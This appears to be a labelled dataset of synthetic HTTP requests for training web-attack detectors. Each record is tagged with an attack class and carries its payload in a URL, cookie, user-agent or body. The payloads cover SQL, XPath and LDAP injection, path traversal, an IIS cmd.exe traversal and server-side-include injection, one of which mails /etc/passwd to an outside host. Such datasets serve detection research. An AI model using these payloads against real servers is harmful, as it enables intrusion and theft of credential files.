Trailer: Upgrade
User-Agent: Mozilla/6.0 (Machintosh; U; Mac OS X 4.5; io-tt; rv:6.6.6) Gecko/15529869
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 484x3782
Via: 6.8 225.108.112.225, 8.6 www.eri6.gif, 6.1 228.65.247.58
Transfer-Encoding: compress
Warning: 071 247.59.205.202 "tlssouninsc" 
X-Forwarded-For: 136.80.200.196
X-Serial-Number: 510031428573357
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~

aeIb=766&lrmdbUnnf=ityfSPB0Et&_qS.UF2Aoptmetaxp=ejDx.&nlr=1626449

End - Id: 43642
Start - Id: 35419
class: SqlInjection
GET /ow/4c1Sk1CQL_/aaB4bU8@5mGDUya/vxf5aantta/aGS5kJFJhxXKF8qHaQ.php4?0niyrmfAsxoA=t%5CdynhqN&ftmlsoosctd=%27+%2F**%2F+++++OR+%2F**%2F++++%27htt4ny%27+++++%3E+++%27S HTTP/1.0
Host: www.ekht.org
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, deflate;q=0.7, compress;q=0.4
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Cookie: eo=09504280
Date: Sat, 01 May 04 17:43:52 UTC
If-Modified-Since: Sat, 24 Sep 05 21:12:23 GMT
If-Match: "xfqE_05OTk93KO.Yl"
If-Range: "r@1bfIIiOX1_k1qKLf"
Referer: /aibp/mreotln/eprdn/N3ae.nsf
User-Agent: ttha/5.4.5
UA-Pixels: 4111x1385
Via: 9.1 www.onew2sgS.css
Transfer-Encoding: gzip
X-Serial-Number: 323144017545

null

End - Id: 35419
Start - Id: 48485
class: XPathInjection
GET /ese0r5/qrmendrkIslpnnraEy/HCKNE1S/yAET2_/tsoeSits.php3?ortnsec=Sin%25j&ssaa8nnlenu=h&Dmxh2wqL=+kg%2B&liMh8n5aa=ngF8JqGd&osttupbtOWpeikw=cp HTTP/1.0
Host: 136.80.145.243
Connection: ee1eey
Accept: */*;q=0.8
Accept-Charset: iso-2022-kr, cp-932, x-mac-ce, euc-tw
Accept-Encoding: identity, compress, compress, compress;q=0.9
Accept-Language: *;q=0.2
Cache-Control: nEun=2
Cookie: miayr=9Etgeu'    or  count(path/child::node()[position(   )=((   i    +  j +k  + l   +1)]     |    path/child::*()[position()=(k+1)])=1   or   'piea4'=    '  wi'     or;bfjKLS=35648980;naxiomepfu=53631;9o6itat= 3trru) s;ainn=tve1Jx
Date: Wed, 07 Mar 07 10:37:23 GMT
ETag: W/"35.-x5FYiNTwL4v"
From: eloh@okac.net
If-Modified-Since: Sat, 28 Jan 06 13:47:56 CET
If-Unmodified-Since: Wed, 31 Mar 04 10:45:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
Pragma: no-cache
Proxy-Authorization: Basic aDJyczFhOkR5ZThoZA==
Authorization: Digest realm
Referer: http://aa427Tm.st/rinw4.wav
TE: trailers,trailers,trailers
User-Agent: Mozilla/0.9 (Machintosh; U; PPC 2.3; ct-ea; rv:9.3.1) Gecko/65365702
UA-CPU: StrongARM
UA-OS: Mac OS X
UA-Pixels: 8188x8148
Transfer-Encoding: identity
Warning: 641 www.anoZ.js "0egrlsnkel" 
X-Forwarded-For: 215.163.147.73
X-Serial-Number: 1996657706794188
----: ----------------------------------

null

End - Id: 48485
Start - Id: 48418
class: XPathInjection
GET /ys0smatAmsree/EiRd/7O/iJ.-b/vkpomewnoqHe.js?Atis=igpRsnci1dHr&Er2Ghnz=ceemt0rcp%26+n&t6D=aloa&empjuN6moerY=7744087&rymTi=eav%27%7E&fh0iedt=e6blc7iaaenzbinuw&ohwsqdzr=%3Enu%5Btdre&ddPF8Cwjp=b41phpo&ieatmssyva7no=ei+rhtum&oesdaelDerv=7xLytJ&se7haXrko=lvee&4JJ-0dBz=84068429&Capecnhdfo=s&cee9t6=eOxvn HTTP/1.0
Host: 159.102.2.222:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: windows-1255
Accept-Encoding: identity;q=0.3, gzip;q=0.1
Accept-Language: feiehyo-zuhr;q=0.1
Cache-Control: min-fresh=6068
Client-ip: 89.166.184.126
Cookie: Eaccess_logvCfpgRKUY=ne8t;llah6ntcatrYi1i=xpfCoxEtgy8bri;ltha6=Nite2']     |  P    |    //user[  name/text(  )   =   'en
Cookie2: $Version="666"
Date: Thu, 11 Aug 05 18:14:20 GMT
ETag: W/"iAuTrX58wVWk91DgMt"
Expect: Fieat7a=ufeoa8;r8bakNl=niGie
From: raintj@2nDi.com
If-Modified-Since: Sun, 17 Sep 06 11:44:09 CET
If-Unmodified-Since: Fri, 23 Mar 07 19:26:08 GMT
If-Match: "5OVaCcaRotQlNV5-nTAv"
If-None-Match: "IWNPEwyVnTqQdnrypczP"
If-Range: *
Max-Forwards: 198
MIME-Version: 5.7
Pragma: es=8miaox
Proxy-Authorization: Digest opaque="uacst"
Authorization: Digest realm
Range: -031,3032-
Referer: http://tetuts.org/ycaol/thm02mt/veiioo/0eTip7ae.pl
TE: chunked
Trailer: If-Modified-Since
User-Agent: Mozilla/9.0 (compatible; eyuae; WinNT; iaainEo; kToaB; hoiksrr9)
UA-CPU: PowerPC
UA-Disp: 213,9851,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3221x6043
Via: 4.1 www.6aaENo.jpeg:9, FTP/8.0 www.kWegpie.jpeg, 7.2 87.88.157.242
Transfer-Encoding: identity
Upgrade: eur/6.6
Warning: 948 www.zarkea.htm "yheWtkpanxoe" "Mon, 05 Apr 04 20:51:23 GMT"
X-Forwarded-For: 111.136.165.75
X-Serial-Number: 86756657363
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 48418
Start - Id: 44722
class: PathTransversal
PUT /eMitnsKr/erzHMGpWJj198/ysJfs/oeDstrt0snaao/SXsamYor932from/bComefbt45o/furrrpUnaaoi/UmeeNae/DbetweenQob-rNU/tscr/onafhluSiaNetcvutuJ.php3? HTTP/1.0
Content-Length: 192
Content-Language: btzo,o,oa88
Content-Encoding: identity
Content-MD5: ZG50aWh1eHR3eUxmZXQzcA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 27 Oct 04 03:02:06 CET
Host: 133.43.48.91:80
Connection: aaaTttOg
Accept: */*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: v2our-mnE, dezt-OnedeOtC;q=0.8, ewue-2mpab2;q=0.8
Date: Sun, 23 May 04 15:40:01 CET
Max-Forwards: 5
Referer: /ownils/isdloaoc/srsoafs/aaahcr.asp
User-Agent: Mozilla/6.8 (compatible; Konqueror/4.5; Linux i386; et6saEozn; 6k8ioobpds)

eeesojsoo=../../../it/admin.txt&ldus8sopn7o1Tar=o-bgivgrsV&a9Bse=?e9wbf dseAdg&hsh01ernsn7ek=so&0a5KudX=51691&naetispaen9=odwdkl&rMj@jlNHf4gp=ltohttwqesedontrzA&eZ1tnar=msbifezeyerhf

End - Id: 44722
Start - Id: 37595
class: LdapInjection
POST /nVM/etP2fXkAhvxycjgw9ynR/wodbtesx/nieeulcrptttE/ljrtoglan/wR/jZH/ilDwhstnx-/rg7OashSryhq4oafXiao/fYmey.bin? HTTP/1.1
Content-Length: 255
Content-Language: otG
Content-Encoding: deflate
Content-Location: http://jizf3.net/IwslziLe.exe
Content-MD5: cmlhcHNvZUlneXRsbGl0dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Oct 05 15:41:05 UTC
Last-Modified: Thu, 19 Apr 07 11:35:51 CET
Host: 145.31.3.39
Connection: lwoucnem
Accept: */*
Accept-Charset: koi8;q=0.3, koi8, iso-8859-6;q=0.8, iso-8859-6;q=0.8, big5;q=0.0
Accept-Encoding: deflate;q=0.8, deflate, deflate;q=0.4, deflate;q=0.6
Accept-Language: *;q=0.4
Cache-Control: max-age=99778
Client-ip: 99.181.231.1
Cookie: V@K@4RE.H=8ZF
Cookie2: $Version="063"
Date: Sat, 26 Apr 08 11:15:08 UTC
ETag: "@QX@_ywUL101QKMd"
Expect: 100-continue
From: atns@eiaaaj.fr
If-Modified-Since: Sat, 09 Jul 05 08:39:11 GMT
If-Unmodified-Since: Sun, 02 Dec 07 11:15:13 UTC
If-Match: "cNDMqEjUm2--epdjG64C"
If-None-Match: *
If-Range: Mon, 05 Jun 06 21:42:35 GMT
Max-Forwards: 7
MIME-Version: 4.3
Pragma: C=cdyales
Proxy-Authorization: Digest qop=Sogaol
Authorization: E0D6 toUen=M8keim
Range: 3-46,1783-444359
Referer: http://www.taiIIl.uk/hgc09/ysnnyj.cfm
TE: deflate;q=0.6,chunked
Trailer: Accept-Language
User-Agent: eweoisocrnccerssfy
UA-CPU: PowerPC
UA-Disp: 9677,0662,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 770x317
Via: HTTP/6.6 5.56.156.91
Transfer-Encoding: gzip
Upgrade: vYs/1.2
Warning: 943 www.FaAepr.shtml "i9ws4h7nus" 
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35061677814454
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

t3=o4aF_BjQ&tazndetoeap=ginput3z>oa&Iqt7_CJHM=ki:@t>3+to&lgterNoeyrifs=) ( |  (displayName=had*)    (name   = had*  )(   mail=had*    )&ihsw=ey4c&toru92=69vr&cEdauibTin=881834&BGWvH_Nd=ztn&QlfL0linkQZ=1446&u3hteeisdb9o=94

End - Id: 37595
Start - Id: 44151
class: OsCommanding
GET /scripts/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 3.70.33.251
Connection: keep-alive
Accept: application/*;q=0.2, audio/*;q=0.7, audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 160.44.210.172
Cookie: 6lbe4=scopy telnetqg(
Cookie2: $Version="0"
Date: Mon, 14 Nov 05 20:41:08 CET
ETag: W/"KuJgjGf4aIE960gFup"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Sat, 11 Aug 07 08:00:30 UTC
If-Unmodified-Since: Fri, 30 Apr 04 18:50:21 GMT
If-Match: "D.@porpLCF@3E-TB4"
If-None-Match: *
If-Range: Sun, 28 Nov 04 07:58:01 GMT
Max-Forwards: 9225
MIME-Version: 7.5
Pragma: l2='nndRc'
Proxy-Authorization: Digest realm
Authorization: NTLM SDB6ZTNwYVNvdG1lM2F0YW5ob2RzZWNUdWgyZTNrbW9wZGhzYzdyb0k=
Range: 815-,644-20793
Referer: http://uonsg66.gov/e7rYnt/nelff/uefNs/Wtgek/e52e.js
TE: trailers,trailers,gzip
Trailer: Date
User-Agent: Mozilla/7.1 (Windows; U; WinNT 2.2; Gn-l0; rv:5.7.4) Gecko/32490412
UA-CPU: Sparc
UA-Disp: 616,3302,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5788x525
Via: nldsg/8.2 184.179.46.67, 5.6 157.114.92.188, 6.1 244.151.168.19
Transfer-Encoding: gzip
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 461 www.cMmiov.shtml "nih5iohnfhs8ylysduaa" "Thu, 12 Feb 09 12:33:00 CET"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44151
Start - Id: 38984
class: LdapInjection
GET /egA7Ir_2flu5i-xesJxP/eW_83X.bin?ekehmnfat=p&oIeRrd=znph-%26c0iechoep%3Bo&ioll=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: www.otebod.st:91
Connection: hkitaezs
Accept: */*;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 21.1.182.109
Cookie: nslr=sewt;OEe1Ka6NjyoY=r9sh-e1e';ikctrg8o=18224;deEHoacnsEeioas=25853
Cookie2: $Version="51"
Date: Sun, 06 Feb 05 07:21:53 CET
ETag: W/"HJ3W6ctq6S95b2ZaHN"
Expect: fijaol
From: hen1pimh@E3rhrtw1.uk
If-Modified-Since: Sat, 13 Nov 04 14:54:41 GMT
If-Unmodified-Since: Fri, 18 Sep 09 22:34:41 UTC
If-Match: "hw@g.aqbClKuNyUMz"
If-None-Match: *
If-Range: Tue, 18 May 04 10:38:07 UTC
Max-Forwards: 69
MIME-Version: 8.0
Pragma: r=datNtrb
Proxy-Authorization: Basic dlliYjpuaXNk
Authorization: Digest cnonce="rtli"
Range: 2-,-247703
Referer: http://www.mohnECre.cz/tyttc/p4ay2r/owpiaa/eDtfay/tE7blhor.js
TE: trailers,gzip;q=0.7
Trailer: Date
User-Agent: Mozilla/4.6 (compatible; n9btjn; Windows NT; 5one0el; iialIne)
UA-CPU: MIPS
UA-OS: Windows 98
UA-Pixels: 8193x847
Via: j18a9a/0.1 37.144.199.88
Transfer-Encoding: deflate
Upgrade: rsS/8.2, 0dcoT/9.2, sO3bf/3.2, o6e/7.5
Warning: 291 www.9uop.js "voehitwHsNuovsder" "Mon, 25 Jan 10 10:06:46 CET"
X-Serial-Number: 95673
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 38984
Start - Id: 48545
class: XPathInjection
POST /f37/lealpy0nidteere.php? HTTP/1.1
Content-Length: 229
Content-Language: m5r,asure,bM
Content-Encoding: identity
Content-Location: /aerC/0nxnyEti/eehyde/eeum.png
Content-MD5: YzlzdGo0ZWppemlyTHM2cw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Jan 10 09:24:31 UTC
Last-Modified: Sun, 11 Mar 07 19:53:16 GMT
Host: 181.176.101.152:336
Connection: f0otoEo
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 220.175.249.82
Cookie: tvl9ed19poeuh2O=hbsTtGhtsUhEsef
Cookie2: $Version="4"
Date: Sun, 15 Jul 07 05:37:29 CET
ETag: W/"VEWmiSXDjK-PzOVZj6"
Expect: wnoeeHd
From: 5lotN@aerqwne.st
If-Modified-Since: Fri, 05 Dec 08 10:19:32 GMT
If-Unmodified-Since: Mon, 09 Feb 04 24:32:05 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 19 May 05 09:28:06 GMT
Max-Forwards: 750
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: rOl0ta 9ssa=Epiteonc
Authorization: NTLM dE5kYWF6dGFzZmlvdWJzQk9MbzNvZW42d3Ryc21iZXQ=
Range: -3
Referer: http://O2hnt.be/fr15/sneoe/eutHr/xnnhnet1.php3
TE: deflate
Trailer: Max-Forwards
User-Agent: lP0nsO http://www.NshCo.st
UA-CPU: StrongARM
UA-Disp: 8426,8051,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 429x1759
Via: FTP/1.9 www.tGilfPw.jpeg, 4.2 www.rnse.js
Transfer-Encoding: identity
Warning: 055 209.226.85.199:70292 "mEpIrti5alp3ed" "Wed, 13 Sep 06 22:52:18 CET"
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 63432598525498098
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

leom6meW92s=587049156&jqnmdTdit=99   or     count(path/child::node()[position()=((i+j+k+l+1)] |    path/child::*()[position()=(k+1)])=1   or     2424=&fztpsv=e

End - Id: 48545
Start - Id: 49163
class: XPathInjection
GET /7ajvon6e2hndnhsa/erhannoldnthee.nsf?nt=08908+++++or++++1%3C+++xSEtsM%2Faupoer%2Fe%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D022%5D+or+9509%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&eoszuuo=328&rteewscEno=o%22%40+%22o-Rpt%3F%3CndhHIrl&6Yoio=5409&lA=3mhyrj+&ah=naT&simaleib6ohe=eidsUivos7&5tH2aeiyetiiwi=tceoesiahfhsXaf&9etIvteu=062044&LHFdeA07P6Q9=n%3B%3AT HTTP/1.0
Host: www.enaudase3.ch
Connection: keep-alive
Accept: image/*;q=0.7, text/html;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.9
Cache-Control: banolleD='llid'
Client-ip: 38.175.250.11
Cookie: szbamtee9xiyfn7=3;tea8fnoztnjiOs=p s t;cnAn=567564;ld6wrm1foee=xtermrl
Cookie2: $Version="03"
Date: Tue, 08 Jul 08 09:05:20 UTC
ETag: "CXlJzMWgpePUm-c"
Expect: 100-continue
From: esgt1xrh@tidc.com
If-Modified-Since: Mon, 09 Feb 09 05:34:14 CET
If-Unmodified-Since: Sun, 20 Jul 08 21:57:27 GMT
If-Match: "fDTac4ixykcZPZfs"
If-None-Match: "uLyRHl6Vyb3jBji5ZbXM"
If-Range: Wed, 16 May 07 15:04:46 GMT
Max-Forwards: 8861
MIME-Version: 5.8
Pragma: yEweamfG='67'
Proxy-Authorization: Digest opaque="Mpzdea"
Authorization: ptad c8aietA=roddisd
Range: -441207,31726-,-3
Referer: /gyreaiad/sfrrpoc.js
TE: trailers,trailers,deflate;q=0.6
Trailer: If-Range
User-Agent: hismt4tmC (vr.8FDfkAd; vq46V3; phUlAsdSy; wJTRrQq)
UA-CPU: StrongARM
UA-Disp: 8001,6616,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 290x3654
Via: 9.9 www.eere.htm, 7.2 www.kgnes.js
Transfer-Encoding: gzip
Upgrade: rMm/8.7
Warning: 291 113.152.215.252 "6unhh" "Fri, 21 Oct 05 09:21:56 GMT"
X-Forwarded-For: 162.244.173.223
X-Serial-Number: 017399203750342
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49163
Start - Id: 50030
class: XPathInjection
POST /2jHsCvUng4Q4vy2/sOzSblqBV_l/nMLlJC2wncn5Dcd1Wh/6J_jLv.IrBFeEg7/frttisnklb7qk4meo/mupfaldeiNsir.tiff? HTTP/1.0
Content-Length: 247
Content-Language: qa,aobryhs
Content-Encoding: deflate
Content-Location: http://ngayte.cz/lOvh/ateifiyg/0e9oisrt.css
Content-MD5: YW90bm5kdHN1eVNFc2VMZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Jun 04 19:56:52 UTC
Last-Modified: Wed, 27 Jun 07 07:18:18 CET
Host: 182.36.24.91
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: Efo-de4;q=0.3, dEt-aow;q=0.2
Cache-Control: max-stale=429
Client-ip: 243.10.0.250
Cookie: vBtfHdQ=iiftu0oestbsPymd;vleoTbrhaper=sm74CQ;qtsktn=o$ny;etyasYd=I 5nssock_streamrexyeln;Ry85styleacN=uioars
Cookie2: $Version="4"
Date: Sun, 16 Mar 08 20:16:52 CET
Expect: Ts6dir=toie;scmeu2e
From: nedh@e0uheaoepd.com
If-Modified-Since: Fri, 11 Jan 08 01:04:23 UTC
If-Unmodified-Since: Mon, 29 Aug 05 08:59:27 CET
If-Match: "ciBNgcK_0dUY-Ny"
If-None-Match: "UGiQjbyeXWF7qAoCjX@7"
If-Range: Thu, 02 Nov 06 19:22:53 GMT
Max-Forwards: 7805
MIME-Version: 2.6
Pragma: hi=n
Proxy-Authorization: Digest cnonce="eilgi"
Authorization: Digest uri=http://gno7nns.org/uuAaA/dera9d2o/ddaeuW.css
Range: 574954-,20-
Referer: http://www.ilhnpa.com/itdkden/z7Tvyvnw/0lnUdo9/eUIla/o9na.html
TE: trailers
User-Agent: pj1aiip'  or     count(path/child::node()[position(  )=((   i    +    j    +  k    + l  + 1)]     |   path/child::*()[position()=(k+1)])=1   or     'wb' =    ' ge' or
UA-CPU: StrongARM
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 412x6538
Via: 5.9 41.156.11.57:8661, 9.1 75.155.110.20, HTTP/4.0 45.71.40.6
Transfer-Encoding: gzip
Upgrade: odsrn/7.3, noifE/8.7
Warning: 364 www.snye8.shtml "eosaaz" 
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

rH=lhsA8rs3a6&2E9isls2hroami=YelF2cuhnn3Ueio&PZorW=ail8fesp$&i7q5e=32080&iihvSchttQnsMd=46385862&srHssmThu=wsz&dvsoUu1ulii=mt>r1ghl&tsie9oe=il81kTfujv0p&oahtsoNoTl=liX&0reea=53&uoyt=edocumenteg&Ei9Ihslsodati=[hte inyT&eghmi8dft=ccieti2twtees

End - Id: 50030
Start - Id: 40888
class: SSI
GET /6eqnaddo/itntsaoafPesWnnb/hn2DkR4@/oIj0W-n/ewot/oataey2r4bawft2mt/i13XYbBt.tiff?ZJEiLS-3d.=53715&sniAasTsp1uj53=%3C%21--+++%23odbc+++++connect%3D%22ncNa4%2C9aZkas%2Ctpcie%22+++++statement%3D%22select++*+from+n0n%22--%3E&uoN=35&eqo=eP&hr=ihxoEtzlogoRo%29z9d&hen5=4023 HTTP/1.0
Host: 222.69.176.172
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: us-ascii;q=0.4, utf-7, euc-cn;q=0.9, utf-8;q=0.0, windows-1253
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 74.22.128.43
Cookie: D4hhnna6tgx=4076658244;xclohtoaafs=passwd ;1snnTien3rcH0=f0lK3Y;ctanrste6box=84989;z3tCnwise=emafauu;eireOUsO4ed=sock_streamroe
Cookie2: $Version="39"
Date: Fri, 06 Feb 04 01:20:08 CET
ETag: W/"cdUEMz1rdtb6L7v"
Expect: iu4peePa=sip9hx
From: iead0@nuqh1.org
If-Modified-Since: Wed, 23 Jul 08 14:12:04 UTC
If-Unmodified-Since: Wed, 19 Dec 07 16:22:36 GMT
If-Match: "x0_MVrX31f6q@-wpA.Me"
If-None-Match: "oVfTtr.6CxBgxzT"
If-Range: Sat, 15 Jan 05 02:24:26 CET
Max-Forwards: 4
MIME-Version: 7.8
Pragma: eteae=iu
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: NTLM dGRqYUlJdG5vODJuZW5kN25yaXR0c2FjQXJwaW90aWlyeHlyYXNpZXNza2lvSXNy
Range: 453-748
Referer: /THsff/efoudse.fgf
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.1 (Windows; U; Win 9x 3.9; oc-be; rv:7.6.9) Gecko/35082995
UA-CPU: x86
UA-Disp: 8926,1457,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: HTTP/5.0 168.162.201.153:17786, 3.8 www.rs8c.html
Transfer-Encoding: tortcT
Upgrade: i72f/4.9, Zi2a/5.6, sifx9/9.1
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 1967556980
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40888
Start - Id: 40154
class: SSI
GET /hUZ_/ari/t_BI5DKXAx1lrk_/tIgBu4YCZK_/l9Ml@8m1o6ZvP0D/iGENi7uTisrn9ir6ag/bei/Opflxew3egosi/sR5mejb/u6zA.7st2r/tWxpxadKIVOvTfPy/zntetetfnc.gif?qOnnau=eekh&ns1=eEE&0ihcsueec=%3C%21--+++++%23exec+++++cmd%3D%22%2Fbin%2Fmail++++aeDeeisu.com++++%3C++%2Fetc%2Fpasswd%22--%3E&oafIrTn1is=45433651&jichxS=hClcjvg HTTP/1.1
Host: 2.208.19.187:7
Connection: rrotiysi
Accept: image/gif;q=0.3, image/png;q=0.7
Accept-Charset: windows-1253
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 163.65.44.55
Cookie: Ir=4372;t9e=6745644;6iosedoe=pnh6e
Cookie2: $Version="8"
Date: Mon, 30 Jun 08 20:22:10 UTC
ETag: "qmJ@VE5bg4LWn_pk"
Expect: t3ettda=ktisluei;iw3hm
From: stce@ygsk.st
If-Modified-Since: Thu, 29 May 08 04:37:52 GMT
If-Unmodified-Since: Wed, 05 May 10 01:20:33 GMT
If-Match: *
If-None-Match: *
If-Range: "xVrPC8A0zxEfnwkZ2J"
Max-Forwards: 8261
MIME-Version: 1.5
Pragma: rc=o
Proxy-Authorization: NTLM Z3RhdW90YWpuN2NoYWdhZWUwaG1zcmV0ZkFpZWx0cmVkdDV0
Authorization: teeta oybqtth=we3ig9Q
Range: 461-5609
Referer: /teKc/saelo/torr.doc
TE: trailers,chunked
Trailer: Warning
User-Agent: Mozilla/3.7 (Windows; U; Windows NT 2.7; ez-2h; rv:2.3.2) Gecko/07819692
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 427x7361
Via: FTP/6.6 www.Emsrduee.gif
Transfer-Encoding: identity
Upgrade: llr4iH/0.1, ihexp3/7.5, 4cG/7.6, txi/6.5
Warning: 295 www.rsfxckr.tiff "hYSe8lwzauon" "Sat, 27 May 06 19:07:23 CET"
X-Forwarded-For: 73.204.141.133
X-Serial-Number: 014833432
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40154
Start - Id: 39094
class: LdapInjection
POST /qW9NYdPjybjgZ/includeoBeval-L/tPajmERnneooi/o3frewhEigna/dMdwj/lsM2ei/i2bhe6enmi6ialleei/xmlor00libs0cUotjtmpClike.php3? HTTP/1.0
Content-Length: 101
Content-Language: mn,nfd4md,loc
Content-Encoding: compress
Content-Location: http://www.pstejus.be/hwti/Boaisr/mytu/nhcla/sdre1ct.asp
Content-MD5: bmVnaW5oOWZsc2FzdXBlNA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Jan 05 23:48:23 CET
Last-Modified: Mon, 26 Jan 09 14:52:50 UTC
Host: 35.179.216.41
Connection: eslW
Accept: audio/basic;q=0.1, audio/x-wav, video/quicktime
Accept-Charset: windows-1252, gb2312;q=0.0, us-ascii;q=0.7, us-ascii
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 143.153.115.113
Cookie: lbE=ed1uvw5iaiulIo;P-nodeBlz=<z;nupnocin=1;5ten6haexhl=ohuee)(&(objectClass  =3l9*);Tcy3feivt4rf=t;hsio
Cookie2: $Version="955"
Date: Mon, 19 Jan 04 14:17:46 UTC
ETag: "7H1DeaXiS2yyEZ-l"
Expect: 100-continue
If-Modified-Since: Mon, 07 Mar 05 20:14:41 GMT
If-Unmodified-Since: Fri, 01 Aug 08 14:49:57 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 22 Jan 08 12:11:26 CET
Max-Forwards: 080
Pragma: no-cache
Authorization: Basic NTdpU2FvdTp6bm9S
Referer: http://tmn0yte.gov/1rukosrp/rbl9nR/necbRaku.jpg
TE: deflate;q=0.3
Trailer: Warning
User-Agent: eAb2a7drj2qif
UA-CPU: MIPS
Via: FTP/0.6 www.UGtBa4.png, 8.0 www.htmoaa.htm
Transfer-Encoding: identity
Upgrade: sb5/5.9
Warning: 807 www.ueer.tiff "erWasnenuri" "Mon, 06 Jun 05 18:38:41 GMT"
X-Forwarded-For: 160.192.213.166
X-Serial-Number: 3517637301815
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

het3rjme7isk=45&spthteseo0sw0zt=29204&se=r&Egislei7m=dspPtuoasOnautoexec&rrhymgtnawaiijp=Olrbe@ehom

End - Id: 39094
Start - Id: 46116
class: PathTransversal
POST /dnph-/2cwepssv6mhfivbOolta/tC@I3DTkPmK.js? HTTP/1.0
Content-Length: 78
Content-Language: e6zewegs
Content-Encoding: deflate
Content-Location: http://nE6m.uk/5xes/iRstox/avtEIuhe/n1cd.png
Content-MD5: cmVhZXZycmJpbzRpY3RPVA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 18 Oct 04 24:48:04 CET
Last-Modified: Fri, 15 Dec 06 17:25:39 UTC
Host: www.nse14.com
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: ewe-on, joeal-cchQitp, tiRaerwn-eRelgan, 9enea-orlg0ecn;q=0.3
Cache-Control: only-if-cached
Client-ip: 72.104.182.77
Cookie: 2fjh2@U.NXs0=38;ta8I=Rse
Cookie2: $Version="429"
Date: Thu, 16 Jun 05 08:52:32 GMT
ETag: W/"oSiqqhx9H424PVN"
Expect: wrwse8=toehqye;Sar7
From: sneTb@ntoa.org
If-Modified-Since: Mon, 08 Feb 10 04:49:56 CET
If-Unmodified-Since: Wed, 18 Jun 08 08:40:35 UTC
If-Match: *
If-None-Match: *
If-Range: "5uY0AEEPzhrB.zdy.6_L"
Max-Forwards: 0082
MIME-Version: 1.2
Pragma: utcehiu3='tuIewp'
Proxy-Authorization: NTLM dUF3bnVnc2Vhb3M3SGViSEVpU2NhbmFhdGVtY2dzNG5oczdob2FlZTVqczlhZ2c=
Authorization: Basic SGx3dnk6eXRlTg==
Range: -03018,-4474
Referer: /roases5d/aiey/LlGfit.mdb
TE: gzip;q=0.8,chunked,trailers
Trailer: From
User-Agent: jA9HozrP http://www.5iOtfh.de
UA-CPU: StrongARM
UA-Disp: 013,8329,8
UA-Color: color16
UA-Pixels: 1090x096
Via: 1.9 21.20.191.145, 1.8 www.plef.jpeg, 5.0 www.sni2.jpeg:59774
Transfer-Encoding: deflate
Upgrade: cRpj/3.7
